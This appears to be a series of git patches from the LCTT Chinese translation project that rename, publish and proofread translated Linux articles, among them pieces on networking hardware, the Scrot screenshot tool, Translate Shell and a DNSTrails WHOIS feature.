-[15]:https://github.com/eliben/code-for-blog/blob/master/2017/async-socket-server/uv-isprime-server.c -[16]:https://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/#id6 -[17]:https://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/ diff --git a/translated/tech/20171109 Concurrent Servers- Part 4 - libuv.md b/translated/tech/20171109 Concurrent Servers- Part 4 - libuv.md index b4db491e4e..07994c67b1 100644 --- a/translated/tech/20171109 Concurrent Servers- Part 4 - libuv.md +++ b/translated/tech/20171109 Concurrent Servers- Part 4 - libuv.md @@ -490,3 +490,4 @@ via: https://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/ [15]:https://github.com/eliben/code-for-blog/blob/master/2017/async-socket-server/uv-isprime-server.c [16]:https://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/#id6 [17]:https://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/ + From cc7e3342f64fc88d581ee721b2e71db2bbef0501 Mon Sep 17 00:00:00 2001 From: wxy Date: Mon, 4 Dec 2017 17:28:56 +0800 Subject: [PATCH 0261/1627] =?UTF-8?q?=E8=A1=A5=E5=AE=8C=20PR?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @FelixYFZ 你的 PR 有问题,需要删除原文,并且不能修改文件名,要保留文件名前的日期和扩展名。我帮你修复了。 --- ...g Hardware for Beginners Think Software.md | 79 ------------------- ... Hardware for Beginners Think Software.md} | 0 2 files changed, 79 deletions(-) delete mode 100644 sources/tech/20171012 Linux Networking Hardware for Beginners Think Software.md rename translated/tech/{Linux Networking Hardware for Beginners: Think Software => 20171012 Linux Networking Hardware for Beginners Think Software.md} (100%) diff --git a/sources/tech/20171012 Linux Networking Hardware for Beginners Think Software.md b/sources/tech/20171012 Linux Networking Hardware for Beginners Think Software.md deleted file mode 100644 index 661f5bc2df..0000000000 --- a/sources/tech/20171012 Linux Networking Hardware for Beginners Think Software.md +++ /dev/null @@ -1,79 +0,0 @@ -Translating by FelixYFZ - -Linux Networking Hardware for Beginners: Think Software -============================================================ - -![island network](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/soderskar-island.jpg?itok=wiMaF66b "island network") -Without routers and bridges, we would be lonely little islands; learn more in this networking tutorial.[Creative Commons Zero][3]Pixabay - -Last week, we learned about [LAN (local area network) hardware][7]. This week, we'll learn about connecting networks to each other, and some cool hacks for mobile broadband. - -### Routers - -Network routers are everything in computer networking, because routers connect networks. Without routers we would be lonely little islands. Figure 1 shows a simple wired LAN (local area network) with a wireless access point, all connected to the Internet. Computers on the LAN connect to an Ethernet switch, which connects to a combination firewall/router, which connects to the big bad Internet through whatever interface your Internet service provider (ISP) provides, such as cable box, DSL modem, satellite uplink...like everything in computing, it's likely to be a box with blinky lights. When your packets leave your LAN and venture forth into the great wide Internet, they travel from router to router until they reach their destination. - -### [fig-1.png][4] - -![simple LAN](https://www.linux.com/sites/lcom/files/styles/floated_images/public/fig-1_7.png?itok=lsazmf3- "simple LAN") -Figure 1: A simple wired LAN with a wireless access point.[Used with permission][1] - -A router can look like pretty much anything: a nice little specialized box that does only routing and nothing else, a bigger box that provides routing, firewall, name services, and VPN gateway, a re-purposed PC or laptop, a Raspberry Pi or Arduino, stout little single-board computers like PC Engines...for all but the most demanding uses, ordinary commodity hardware works fine. The highest-end routers use specialized hardware that is designed to move the maximum number of packets per second. They have multiple fat data buses, multiple CPUs, and super-fast memory. (Look up Juniper and Cisco routers to see what high-end routers look like, and what's inside.) - -A wireless access point connects to your LAN either as an Ethernet bridge or a router. A bridge extends the network, so hosts on both sides of the bridge are on the same network. A router connects two different networks. - -### Network Topology - -There are multitudes of ways to set up your LAN. You can put all hosts on a single flat network. You can divide it up into different subnets. You can divide it into virtual LANs, if your switch supports this. - -A flat network is the simplest; just plug everyone into the same switch. If one switch isn't enough you can connect switches to each other. Some switches have special uplink ports, some don't care which ports you connect, and you may need to use a crossover Ethernet cable, so check your switch documentation. - -Flat networks are the easiest to administer. You don't need routers and don't have to calculate subnets, but there are some downsides. They don't scale, so when they get too large they get bogged down by broadcast traffic. Segmenting your LAN provides a bit of security, and makes it easier to manage larger networks by dividing it into manageable chunks. Figure 2 shows a simplified LAN divided into two subnets: internal wired and wireless hosts, and one for servers that host public services. The subnet that contains the public-facing servers is called a DMZ, demilitarized zone (ever notice all the macho terminology for jobs that are mostly typing on a computer?) because it is blocked from all internal access. - -### [fig-2.png][5] - -![LAN](https://www.linux.com/sites/lcom/files/styles/floated_images/public/fig-2_4.png?itok=LpXq7bLf "LAN") -Figure 2: A simplified LAN divided into two subnets.[Used with permission][2] - -Even in a network as small as Figure 2 there are several ways to set it up. You can put your firewall and router on a single device. You could have a dedicated Internet link for the DMZ, divorcing it completely from your internal network. Which brings us to our next topic: it's all software. - -### Think Software - -You may have noticed that of the hardware we have discussed in this little series, only network interfaces, switches, and cabling are special-purpose hardware. Everything else is general-purpose commodity hardware, and it's the software that defines its purpose. Linux is a true networking operating system, and it supports a multitude of network operations: VLANs, firewall, router, Internet gateway, VPN gateway, Ethernet bridge, Web/mail/file/etc. servers, load-balancer, proxy, quality of service, multiple authenticators, trunking, failover...you can run your entire network on commodity hardware with Linux. You can even use Linux to simulate an Ethernet switch with LISA (LInux Switching Appliance) and vde2. - -There are specialized distributions for small hardware like DD-WRT, OpenWRT, and the Raspberry Pi distros, and don't forget the BSDs and their specialized offshoots like the pfSense firewall/router, and the FreeNAS network-attached storage server. - -You know how some people insist there is a difference between a hardware firewall and a software firewall? There isn't. That's like saying there is a hardware computer and a software computer. - -### Port Trunking and Ethernet Bonding - -Trunking and bonding, also called link aggregation, is combining two Ethernet channels into one. Some Ethernet switches support port trunking, which is combining two switch ports to combine their bandwidth into a single link. This is a nice way to make a bigger pipe to a busy server. - -You can do the same thing with Ethernet interfaces, and the bonding driver is built-in to the Linux kernel, so you don't need any special hardware. - -### Bending Mobile Broadband to your Will - -I expect that mobile broadband is going to grow in the place of DSL and cable Internet. I live near a city of 250,000 population, but outside the city limits good luck getting Internet, even though there is a large population to serve. My little corner of the world is 20 minutes from town, but it might as well be the moon as far as Internet service providers are concerned. My only option is mobile broadband; there is no dialup, satellite Internet is sold out (and it sucks), and haha lol DSL, cable, or fiber. That doesn't stop ISPs from stuffing my mailbox with flyers for Xfinity and other high-speed services my area will never see. - -I tried AT&T, Verizon, and T-Mobile. Verizon has the strongest coverage, but Verizon and AT&T are expensive. I'm at the edge of T-Mobile coverage, but they give the best deal by far. To make it work, I had to buy a weBoost signal booster and ZTE mobile hotspot. Yes, you can use a smartphone as a hotspot, but the little dedicated hotspots have stronger radios. If you're thinking you might want a signal booster, I have nothing but praise for weBoost because their customer support is superb, and they will do their best to help you. Set it up with the help of a great little app that accurately measures signal strength, [SignalCheck Pro][8]. They have a free version with fewer features; spend the two bucks to get the pro version, you won't be sorry. - -The little ZTE hotspots serve up to 15 hosts and have rudimentary firewalls. But we can do better: get something like the Linksys WRT54GL, replace the stock firmware with Tomato, OpenWRT, or DD-WRT, and then you have complete control of your firewall rules, routing, and any other services you want to set up. - --------------------------------------------------------------------------------- - -via: https://www.linux.com/learn/intro-to-linux/2017/10/linux-networking-hardware-beginners-think-software - -作者:[CARLA SCHRODER][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.linux.com/users/cschroder -[1]:https://www.linux.com/licenses/category/used-permission -[2]:https://www.linux.com/licenses/category/used-permission -[3]:https://www.linux.com/licenses/category/creative-commons-zero -[4]:https://www.linux.com/files/images/fig-1png-7 -[5]:https://www.linux.com/files/images/fig-2png-4 -[6]:https://www.linux.com/files/images/soderskar-islandjpg -[7]:https://www.linux.com/learn/intro-to-linux/2017/10/linux-networking-hardware-beginners-lan-hardware -[8]:http://www.bluelinepc.com/signalcheck/ diff --git a/translated/tech/Linux Networking Hardware for Beginners: Think Software b/translated/tech/20171012 Linux Networking Hardware for Beginners Think Software.md similarity index 100% rename from translated/tech/Linux Networking Hardware for Beginners: Think Software rename to translated/tech/20171012 Linux Networking Hardware for Beginners Think Software.md From dd648ed53ae15ced3ff13219b97f1c51edcaa4de Mon Sep 17 00:00:00 2001 From: wxy Date: Mon, 4 Dec 2017 17:29:41 +0800 Subject: [PATCH 0262/1627] =?UTF-8?q?=E8=A1=A5=E5=AE=8C=20PR?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @filefi 不要丢掉扩展名。 --- ...20171202 Scrot Linux command-line screen grabs made simple.md} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename sources/tech/{20171202 Scrot Linux command-line screen grabs made simple => 20171202 Scrot Linux command-line screen grabs made simple.md} (100%) diff --git a/sources/tech/20171202 Scrot Linux command-line screen grabs made simple b/sources/tech/20171202 Scrot Linux command-line screen grabs made simple.md similarity index 100% rename from sources/tech/20171202 Scrot Linux command-line screen grabs made simple rename to sources/tech/20171202 Scrot Linux command-line screen grabs made simple.md From 5154aec58e578757c4efd7782ba5a498824d9175 Mon Sep 17 00:00:00 2001 From: wxy Date: Mon, 4 Dec 2017 17:31:40 +0800 Subject: [PATCH 0263/1627] =?UTF-8?q?=E5=B7=B2=E5=8F=91=E5=B8=83?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @geekpi --- .../20171201 Linux Journal Ceases Publication.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {translated/tech => published}/20171201 Linux Journal Ceases Publication.md (100%) diff --git a/translated/tech/20171201 Linux Journal Ceases Publication.md b/published/20171201 Linux Journal Ceases Publication.md similarity index 100% rename from translated/tech/20171201 Linux Journal Ceases Publication.md rename to published/20171201 Linux Journal Ceases Publication.md From f6d529c21c047d9f139928498ee6069dfe396314 Mon Sep 17 00:00:00 2001 From: wxy Date: Mon, 4 Dec 2017 21:38:41 +0800 Subject: [PATCH 0264/1627] =?UTF-8?q?PRF:20171130=20Translate=20Shell=20?= =?UTF-8?q?=E2=80=93=20A=20Tool=20To=20Use=20Google=20Translate=20From=20C?= =?UTF-8?q?ommand=20Line=20In=20Linux.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @lujun9972 译者没署名,我找了半天 /cry --- ...ogle Translate From Command Line In Linux.md | 76 +++++++++---------- 1 file changed, 37 insertions(+), 39 deletions(-) diff --git a/translated/tech/20171130 Translate Shell – A Tool To Use Google Translate From Command Line In Linux.md b/translated/tech/20171130 Translate Shell – A Tool To Use Google Translate From Command Line In Linux.md index 9f905bd496..aeae003532 100644 --- a/translated/tech/20171130 Translate Shell – A Tool To Use Google Translate From Command Line In Linux.md +++ b/translated/tech/20171130 Translate Shell – A Tool To Use Google Translate From Command Line In Linux.md @@ -1,68 +1,65 @@ -Translate Shell: 一款在 Linux 命令行中使用 Google Translate的工具 +Translate Shell :一款在 Linux 命令行中使用谷歌翻译的工具 ============================================================ -我对 CLI 应用非常感兴趣,因此热衷于使用并分享 CLI 应用。 我之所以更喜欢 CLI 很大原因是因为我在大多数的时候都使用的是字符界面(black screen),已经习惯了使用 CLI 应用而不是 GUI 应用. +我对 CLI 应用非常感兴趣,因此热衷于使用并分享 CLI 应用。 我之所以更喜欢 CLI 很大原因是因为我在大多数的时候都使用的是字符界面(black screen),已经习惯了使用 CLI 应用而不是 GUI 应用。 -我写过很多关于 CLI 应用的文章。 最近我发现了一些 google 的 CLI 工具,像 “Google Translator”, “Google Calendar”, 和 “Google Contacts”。 这里,我想在给大家分享一下。 +我写过很多关于 CLI 应用的文章。 最近我发现了一些谷歌的 CLI 工具,像 “Google Translator”、“Google Calendar” 和 “Google Contacts”。 这里,我想在给大家分享一下。 -今天我们要介绍的是 “Google Translator” 工具。 由于母语是泰米尔语,我在一天内用了很多次才理解了它的意义。 +今天我们要介绍的是 “Google Translator” 工具。 由于我的母语是泰米尔语,我在一天内用了很多次才理解了它的意义。 -`Google translate` 为其他语系的人们所广泛使用。 +谷歌翻译为其它语系的人们所广泛使用。 ### 什么是 Translate Shell -[Translate Shell][2] (之前叫做 Google Translate CLI) 是一款借助 `Google Translate`(默认), `Bing Translator`, `Yandex.Translate` 以及 `Apertium` 来翻译的命令行翻译器。 -它让你可以在终端访问这些翻译引擎. `Translate Shell` 在大多数Linux发行版中都能使用。 +[Translate Shell][2] (之前叫做 Google Translate CLI) 是一款借助谷歌翻译(默认)、必应翻译、Yandex.Translate 以及 Apertium 来翻译的命令行翻译器。它让你可以在终端访问这些翻译引擎。 Translate Shell 在大多数 Linux 发行版中都能使用。 ### 如何安装 Translate Shell -有三种方法安装 `Translate Shell`。 +有三种方法安装 Translate Shell。 * 下载自包含的可执行文件 - * 手工安装 +* 通过包管理器安装 -* 通过包挂力气安装 - -#### 方法-1 : 下载自包含的可执行文件 +#### 方法 1 : 下载自包含的可执行文件 下载自包含的可执行文件放到 `/usr/bin` 目录中。 -```shell +``` $ wget git.io/trans $ chmod +x ./trans $ sudo mv trans /usr/bin/ ``` -#### 方法-2 : 手工安装 +#### 方法 2 : 手工安装 -克隆 `Translate Shell` github 仓库然后手工编译。 +克隆 Translate Shell 的 GitHub 仓库然后手工编译。 -```shell +``` $ git clone https://github.com/soimort/translate-shell && cd translate-shell $ make $ sudo make install ``` -#### 方法-3 : Via Package Manager +#### 方法 3 : 通过包管理器 -有些发行版的官方仓库中包含了 `Translate Shell`,可以通过包管理器来安装。 +有些发行版的官方仓库中包含了 Translate Shell,可以通过包管理器来安装。 -对于 Debian/Ubuntu, 使用 [APT-GET Command][3] 或者 [APT Command][4]来安装。 +对于 Debian/Ubuntu, 使用 [APT-GET 命令][3] 或者 [APT 命令][4]来安装。 -```shell +``` $ sudo apt-get install translate-shell ``` -对于 Fedora, 使用 [DNF Command][5] 来安装。 +对于 Fedora, 使用 [DNF 命令][5] 来安装。 -```shell +``` $ sudo dnf install translate-shell ``` -对于基于 Arch Linux 的系统, 使用 [Yaourt Command][6] 或 [Packer Command][7] 来从 AUR 仓库中安装。 +对于基于 Arch Linux 的系统, 使用 [Yaourt 命令][6] 或 [Packer 明快][7] 来从 AUR 仓库中安装。 -```shell +``` $ yaourt -S translate-shell or $ packer -S translate-shell @@ -70,7 +67,7 @@ $ packer -S translate-shell ### 如何使用 Translate Shell -安装好后,打开终端闭关输入下面命令。 `Google Translate` 会自动探测源文本是哪种语言,并且在默认情况下将之翻译成你的 `locale` 所对应的语言。 +安装好后,打开终端闭关输入下面命令。 谷歌翻译会自动探测源文本是哪种语言,并且在默认情况下将之翻译成你的 `locale` 所对应的语言。 ``` $ trans [Words] @@ -119,7 +116,7 @@ thanks நன்றி ``` -要将一个单词翻译到多个语种可以使用下面命令(本例中, 我将单词翻译成泰米尔语以及印地语)。 +要将一个单词翻译到多个语种可以使用下面命令(本例中,我将单词翻译成泰米尔语以及印地语)。 ``` $ trans :ta+hi thanks @@ -172,7 +169,7 @@ what is going on your life? உங்கள் வாழ்க்கையில் என்ன நடக்கிறது? ``` -下面命令独立地翻译各个单词。 +下面命令单独地翻译各个单词。 ``` $ trans :ta curios happy @@ -208,14 +205,14 @@ happy சந்தோஷமாக, மகிழ்ச்சி, இனிய, சந்தோஷமா ``` -简洁模式: 默认情况下,`Translate Shell` 尽可能多的显示翻译信息. 如果你希望只显示简要信息,只需要加上`-b`选项。 +简洁模式:默认情况下,Translate Shell 尽可能多的显示翻译信息。如果你希望只显示简要信息,只需要加上 `-b`选项。 ``` $ trans -b :ta thanks நன்றி ``` -字典模式: 加上 `-d` 可以把 `Translate Shell` 当成字典来用. +字典模式:加上 `-d` 可以把 Translate Shell 当成字典来用。 ``` $ trans -d :en thanks @@ -294,14 +291,14 @@ See also Thanks!, thank, many thanks, thanks to, thanks to you, special thanks, give thanks, thousand thanks, Many thanks!, render thanks, heartfelt thanks, thanks to this ``` -使用下面格式可以使用 `Translate Shell` 来翻译文件。 +使用下面格式可以使用 Translate Shell 来翻译文件。 -```shell +``` $ trans :ta file:///home/magi/gtrans.txt உங்கள் வாழ்க்கையில் என்ன நடக்கிறது? ``` -下面命令可以让 `Translate Shell` 进入交互模式. 在进入交互模式之前你需要明确指定源语言和目标语言。本例中,我将英文单词翻译成泰米尔语。 +下面命令可以让 Translate Shell 进入交互模式。 在进入交互模式之前你需要明确指定源语言和目标语言。本例中,我将英文单词翻译成泰米尔语。 ``` $ trans -shell en:ta thanks @@ -324,13 +321,14 @@ thanks நன்றி ``` -想知道语言代码,可以执行下面语言。 +想知道语言代码,可以执行下面命令。 -```shell +``` $ trans -R ``` 或者 -```shell + +``` $ trans -T ┌───────────────────────┬───────────────────────┬───────────────────────┐ │ Afrikaans - af │ Hindi - hi │ Punjabi - pa │ @@ -375,9 +373,9 @@ $ trans -T └───────────────────────┴───────────────────────┴───────────────────────┘ ``` -想了解更多选项的内容,可以查看 `man` 页. +想了解更多选项的内容,可以查看其 man 手册。 -```shell +``` $ man trans ``` @@ -386,8 +384,8 @@ $ man trans via: https://www.2daygeek.com/translate-shell-a-tool-to-use-google-translate-from-command-line-in-linux/ 作者:[Magesh Maruthamuthu][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) +译者:[lujun9972](https://github.com/lujun9972 ) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From c1e67497811606b56c944b0b5ca0c24c156b3561 Mon Sep 17 00:00:00 2001 From: wxy Date: Mon, 4 Dec 2017 21:38:57 +0800 Subject: [PATCH 0265/1627] =?UTF-8?q?PUB:20171130=20Translate=20Shell=20?= =?UTF-8?q?=E2=80=93=20A=20Tool=20To=20Use=20Google=20Translate=20From=20C?= =?UTF-8?q?ommand=20Line=20In=20Linux.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @lujun9972 https://linux.cn/article-9107-1.html --- ...– A Tool To Use Google Translate From Command Line In Linux.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {translated/tech => published}/20171130 Translate Shell – A Tool To Use Google Translate From Command Line In Linux.md (100%) diff --git a/translated/tech/20171130 Translate Shell – A Tool To Use Google Translate From Command Line In Linux.md b/published/20171130 Translate Shell – A Tool To Use Google Translate From Command Line In Linux.md similarity index 100% rename from translated/tech/20171130 Translate Shell – A Tool To Use Google Translate From Command Line In Linux.md rename to published/20171130 Translate Shell – A Tool To Use Google Translate From Command Line In Linux.md From ed1e163307f8a62567b184db20647731116a4272 Mon Sep 17 00:00:00 2001 From: wxy Date: Mon, 4 Dec 2017 22:02:54 +0800 Subject: [PATCH 0266/1627] PRF&PUB:20171130 New Feature Find every domain someone owns automatically.md @geekpi --- ...d every domain someone owns automatically.md | 17 ++++++++--------- 1 file changed, 8 insertions(+), 9 deletions(-) rename {translated/tech => published}/20171130 New Feature Find every domain someone owns automatically.md (69%) diff --git a/translated/tech/20171130 New Feature Find every domain someone owns automatically.md b/published/20171130 New Feature Find every domain someone owns automatically.md similarity index 69% rename from translated/tech/20171130 New Feature Find every domain someone owns automatically.md rename to published/20171130 New Feature Find every domain someone owns automatically.md index 4b72eaae5e..e8866a5ce5 100644 --- a/translated/tech/20171130 New Feature Find every domain someone owns automatically.md +++ b/published/20171130 New Feature Find every domain someone owns automatically.md @@ -1,16 +1,15 @@ -新功能:自动找出每个域名的拥有者 +使用 DNSTrails 自动找出每个域名的拥有者 ============================================================ - 今天,我们很高兴地宣布我们最近几周做的新功能。它是 Whois 聚合工具,现在可以在 [DNSTrails][1] 上获得。 -在过去,查找一个域名的所有者会花费很多时间,因为大部分时间你都需要把域名指向一个 IP 地址,以便找到同一个人拥有的其他域名。 +在过去,查找一个域名的所有者会花费很多时间,因为大部分时间你都需要把域名翻译为一个 IP 地址,以便找到同一个人拥有的其他域名。 -使用老的方法,你会很轻易地在一个工具和另外一个工具的研究和交叉比较结果中花费数个小时,直到得到你想要的域名。 +使用老的方法,在得到你想要的域名列表之前,你在一个工具和另外一个工具的一日又一日的研究和交叉比较结果中经常会花费数个小时。 -感谢这个新工具和我们的智能[WHOIS 数据库][2],现在你可以搜索任何域名,并获得组织或个人注册的域名的完整列表,并在几秒钟内获得准确的结果。 +感谢这个新工具和我们的智能 [WHOIS 数据库][2],现在你可以搜索任何域名,并获得组织或个人注册的域名的完整列表,并在几秒钟内获得准确的结果。 -### 我如何使用Whois聚合功能? +### 我如何使用 Whois 聚合功能? 第一步:打开 [DNSTrails.com][3] @@ -28,15 +27,15 @@ 如果你正在调查互联网上任何个人的域名所有权,这意味着即使域名甚至没有指向注册服务商的 IP,如果他们使用相同的电话和邮件地址,我们仍然可以发现其他域名。 -想知道一个人拥有的其他域名么?亲自试试 [DNStrails][5] 的[ WHOIS 聚合功能][4]或者[使用我们的 API 访问][6]。 +想知道一个人拥有的其他域名么?亲自试试 [DNStrails][5] 的 [WHOIS 聚合功能][4]或者[使用我们的 API 访问][6]。 -------------------------------------------------------------------------------- via: https://securitytrails.com/blog/find-every-domain-someone-owns -作者:[SECURITYTRAILS TEAM ][a] +作者:[SECURITYTRAILS TEAM][a] 译者:[geekpi](https://github.com/geekpi) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From aed468f37aacda80ae789a9757c2e615489374cc Mon Sep 17 00:00:00 2001 From: wxy Date: Mon, 4 Dec 2017 22:08:09 +0800 Subject: [PATCH 0267/1627] =?UTF-8?q?=E4=BF=AE=E6=AD=A3=E6=96=87=E4=BB=B6?= =?UTF-8?q?=E5=90=8D?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @oska874 @lujun9972 --- ...em.md => 20171117 System Logs Understand Your Linux System.md} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename translated/tech/{20171117 System Logs: Understand Your Linux System.md => 20171117 System Logs Understand Your Linux System.md} (100%) diff --git a/translated/tech/20171117 System Logs: Understand Your Linux System.md b/translated/tech/20171117 System Logs Understand Your Linux System.md similarity index 100% rename from translated/tech/20171117 System Logs: Understand Your Linux System.md rename to translated/tech/20171117 System Logs Understand Your Linux System.md From ebff11487ce2def13b890ed292ff21432173eb50 Mon Sep 17 00:00:00 2001 From: wxy Date: Mon, 4 Dec 2017 22:20:54 +0800 Subject: [PATCH 0268/1627] =?UTF-8?q?=E7=A7=BB=E9=99=A4=E9=87=8D=E5=A4=8D?= =?UTF-8?q?=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @oska874 --- ...x command-line screen grabs made simple.md | 108 ------------------ 1 file changed, 108 deletions(-) delete mode 100644 sources/tech/20171130 Scrot Linux command-line screen grabs made simple.md diff --git a/sources/tech/20171130 Scrot Linux command-line screen grabs made simple.md b/sources/tech/20171130 Scrot Linux command-line screen grabs made simple.md deleted file mode 100644 index 2b4d2248b2..0000000000 --- a/sources/tech/20171130 Scrot Linux command-line screen grabs made simple.md +++ /dev/null @@ -1,108 +0,0 @@ -Scrot: Linux command-line screen grabs made simple -============================================================ - -### Scrot is a basic, flexible tool that offers a number of handy options for taking screen captures from the Linux command line. - -![Scrot: Screen grabs made simple](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/community-penguins-osdc-lead.png?itok=BmqsAF4A "Scrot: Screen grabs made simple") -Image credits : Original photo by Rikki Endsley. [CC BY-SA 4.0][13] - -There are great tools on the Linux desktop for taking screen captures, such as [KSnapshot][14] and [Shutter][15]. Even the simple utility that comes with the GNOME desktop does a pretty good job of capturing screens. But what if you rarely need to take screen captures? Or you use a Linux distribution without a built-in capture tool, or an older computer with limited resources? - -Turn to the command line and a little utility called [Scrot][16]. It does a fine job of taking simple screen captures, and it includes a few features that might surprise you. - -### Getting started with Scrot - -More Linux resources - -* [What is Linux?][1] - -* [What are Linux containers?][2] - -* [Download Now: Linux commands cheat sheet][3] - -* [Advanced Linux commands cheat sheet][4] - -* [Our latest Linux articles][5] - -Many Linux distributions come with Scrot already installed—to check, type `which scrot`. If it isn't there, you can install Scrot using your distro's package manager. If you're willing to compile the code, grab it [from GitHub][22]. - -To take a screen capture, crack open a terminal window and type `scrot [filename]`, where `[filename]` is the name of file to which you want to save the image (for example, `desktop.png`). If you don't include a name for the file, Scrot will create one for you, such as `2017-09-24-185009_1687x938_scrot.png`. (That filename isn't as descriptive it could be, is it? That's why it's better to add one to the command.) - -Running Scrot with no options takes a screen capture of your entire desktop. If you don't want to do that, Scrot lets you focus on smaller portions of your screen. - -### Taking a screen capture of a single window - -Tell Scrot to take a screen capture of a single window by typing `scrot -u [filename]`. - -The `-u` option tells Scrot to grab the window currently in focus. That's usually the terminal window you're working in, which might not be the one you want. - -To grab another window on your desktop, type `scrot -s [filename]`. - -The `-s` option lets you do one of two things: - -* select an open window, or - -* draw a rectangle around a window or a portion of a window to capture it. - -You can also set a delay, which gives you a little more time to select the window you want to capture. To do that, type `scrot -u -d [num] [filename]`. - -The `-d` option tells Scrot to wait before grabbing the window, and `[num]` is the number of seconds to wait. Specifying `-d 5` (wait five seconds) should give you enough time to choose a window. - -### More useful options - -Scrot offers a number of additional features (most of which I never use). The ones I find most useful include: - -* `-b` also grabs the window's border - -* `-t` grabs a window and creates a thumbnail of it. This can be useful when you're posting screen captures online. - -* `-c` creates a countdown in your terminal when you use the `-d` option. - -To learn about Scrot's other options, check out the its documentation by typing `man scrot` in a terminal window, or [read it online][17]. Then start snapping images of your screen. - -It's basic, but Scrot gets the job done nicely. - -### Topics - - [Linux][23] - -### About the author - - [![That idiot Scott Nesbitt ...](https://opensource.com/sites/default/files/styles/profile_pictures/public/scottn-cropped.jpg?itok=q4T2J4Ai)][18] - - Scott Nesbitt - I'm a long-time user of free/open source software, and write various things for both fun and profit. I don't take myself too seriously and I do all of my own stunts. You can find me at these fine establishments on the web: [Twitter][7], [Mastodon][8], [GitHub][9], and... [more about Scott Nesbitt][10][More about me][11] - --------------------------------------------------------------------------------- - -via: https://opensource.com/article/17/11/taking-screen-captures-linux-command-line-scrot - -作者:[ Scott Nesbitt  ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://opensource.com/users/scottnesbitt -[1]:https://opensource.com/resources/what-is-linux?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent -[2]:https://opensource.com/resources/what-are-linux-containers?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent -[3]:https://developers.redhat.com/promotions/linux-cheatsheet/?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent -[4]:https://developers.redhat.com/cheat-sheet/advanced-linux-commands-cheatsheet?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent -[5]:https://opensource.com/tags/linux?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent -[6]:https://opensource.com/article/17/11/taking-screen-captures-linux-command-line-scrot?rate=H43kUdawjR0GV9D0dCbpnmOWcqw1WekfrAI_qKo8UwI -[7]:http://www.twitter.com/ScottWNesbitt -[8]:https://mastodon.social/@scottnesbitt -[9]:https://github.com/ScottWNesbitt -[10]:https://opensource.com/users/scottnesbitt -[11]:https://opensource.com/users/scottnesbitt -[12]:https://opensource.com/user/14925/feed -[13]:https://creativecommons.org/licenses/by-sa/4.0/ -[14]:https://www.kde.org/applications/graphics/ksnapshot/ -[15]:https://launchpad.net/shutter -[16]:https://github.com/dreamer/scrot -[17]:http://manpages.ubuntu.com/manpages/precise/man1/scrot.1.html -[18]:https://opensource.com/users/scottnesbitt -[19]:https://opensource.com/users/scottnesbitt -[20]:https://opensource.com/users/scottnesbitt -[21]:https://opensource.com/article/17/11/taking-screen-captures-linux-command-line-scrot#comments -[22]:https://github.com/dreamer/scrot -[23]:https://opensource.com/tags/linux From 2cc70c5ed7fa4d4629bed29e652baa634c6b223b Mon Sep 17 00:00:00 2001 From: iron0x <2727586680@qq.com> Date: Mon, 4 Dec 2017 21:40:05 +0800 Subject: [PATCH 0269/1627] Update 20171202 docker - Use multi-stage builds.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 翻译中 --- sources/tech/20171202 docker - Use multi-stage builds.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20171202 docker - Use multi-stage builds.md b/sources/tech/20171202 docker - Use multi-stage builds.md index e1a6414862..8cc8af1c94 100644 --- a/sources/tech/20171202 docker - Use multi-stage builds.md +++ b/sources/tech/20171202 docker - Use multi-stage builds.md @@ -1,3 +1,5 @@ +【iron0x翻译中】 + Use multi-stage builds ============================================================ From 3331a8b0f6aff4b8cafbe021a6a4c00f33b0e5e6 Mon Sep 17 00:00:00 2001 From: wxy Date: Mon, 4 Dec 2017 22:38:01 +0800 Subject: [PATCH 0270/1627] PRF:20171124 Photon Could Be Your New Favorite Container OS.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @KeyLD 恭喜你,完成了第一篇翻译! 不过,按照流程,翻译前应该发起申请的 PR,翻译完提交时,要将原文删除。 --- ...Could Be Your New Favorite Container OS.md | 146 ------------------ ...Could Be Your New Favorite Container OS.md | 77 ++++----- 2 files 